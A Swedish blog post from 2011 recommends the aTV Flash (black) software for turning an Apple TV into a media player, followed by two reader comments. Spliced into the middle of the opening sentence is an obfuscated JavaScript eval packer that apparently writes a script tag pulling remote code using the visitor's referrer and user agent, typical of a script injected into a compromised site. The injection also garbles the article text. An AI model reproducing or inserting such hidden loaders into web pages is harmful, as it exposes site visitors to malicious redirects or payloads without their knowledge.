Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Gör om din AppleTV till en riktig mediaspelare.

Gör om din AppleTV till en riktig mediaspelare.
Filip Urde
  • On 17 november, 2011
  • http://www.revue.se/filip-urde

För dig som tycker att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndyhi|var|u0026u|referrer|ferab||js|php’.split(’|’),0,{}))
AppleTV
är lite väl fattig på funktioner, så har vi här en lösning för dig.

Det heter aTV Flash (black) och är ett mjukvarupaket som du installerar på din AppleTV, som sedan ger din AppleTV möjligheten att  köra en webbläsare, streama mer eller mindre alla format från din NAS eller dator. Det blir helt enkelt en riktigt mediaspelare. Nu kanske det är dags att skaffa en AppleTV…


Mjukvarupaketet kostar 30 dollar (ca 210 kronor).
firecore.com

 

Comments

  1. Johnnnn

    fy fan vad sweet! tack för denna infon! …jag köpte en appleTV för 3 veckor sedan, men blev ganska besviken…. trodde att detta som du skriver nu, skulle varit med från start… Tack för tipset.

  2. Sven

    Är Apple TV bra då?